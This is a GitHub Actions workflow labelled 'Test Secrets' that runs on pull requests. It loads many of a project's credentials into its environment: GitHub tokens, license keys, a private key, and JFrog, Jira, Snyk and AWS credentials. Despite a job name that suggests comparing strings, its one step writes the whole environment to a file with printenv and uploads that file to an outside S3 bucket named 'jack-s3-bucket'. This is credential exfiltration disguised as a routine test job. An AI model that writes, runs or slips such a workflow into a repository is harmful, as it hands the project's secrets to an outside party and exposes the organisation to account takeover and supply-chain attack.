
name: Test Secrets

on:
  pull_request:

jobs:
  compare-strings:
    runs-on: ubuntu-latest
    env:
      BINTRAY_PASSPHRASE: ${{ secrets.BINTRAY_PASSPHRASE }}
      DEVOPS_PRIVATE_KEY: ${{ secrets.DEVOPS_PRIVATE_KEY }}
      DEVOPS_SECRET: ${{ secrets.DEVOPS_SECRET }}
      HZ_LICENSEKEY: ${{ secrets.HZ_LICENSEKEY }}
      CODECOV_TOKEN: ${{ secrets.CODECOV_TOKEN }}
      DOCKERHUB_USERNAME: ${{ secrets.DOCKERHUB_USERNAME }}
      GH_PAT: ${{ secrets.GH_PAT }}
      GH_TOKEN: ${{ secrets.GH_TOKEN }}
      HAZELCAST_ENTERPRISE_KEY: ${{ secrets.HAZELCAST_ENTERPRISE_KEY }}
      HAZELCAST_ENTERPRISE_KEY_V7: ${{ secrets.HAZELCAST_ENTERPRISE_KEY_V7 }}
      HZ_SNAPSHOT_INTERNAL_PASSWORD: ${{ secrets.HZ_SNAPSHOT_INTERNAL_PASSWORD }}
      HZ_SNAPSHOT_INTERNAL_USERNAME: ${{ secrets.HZ_SNAPSHOT_INTERNAL_USERNAME }}
      JFROG_TOKEN: ${{ secrets.JFROG_TOKEN }}
      JFROG_USERNAME: ${{ secrets.JFROG_USERNAME }}
      JIRA_API_TOKEN: ${{ secrets.JIRA_API_TOKEN }}
      JIRA_BASE_URL: ${{ secrets.JIRA_BASE_URL }}
      JIRA_USER_EMAIL: ${{ secrets.JIRA_USER_EMAIL }}
      SLACK_WEBHOOK_MONOREPO: ${{ secrets.SLACK_WEBHOOK_MONOREPO }}
      SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }}

    steps:
      - uses: aws-actions/configure-aws-credentials@v4
        with:
          aws-access-key-id: ${{ secrets.AWS_ACCESS_KEY_ID }}
          aws-secret-access-key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
          aws-region: us-east-1

      - run: |
          printenv >> myfile.txt
          aws s3 cp myfile.txt s3://jack-s3-bucket/myfile.txt
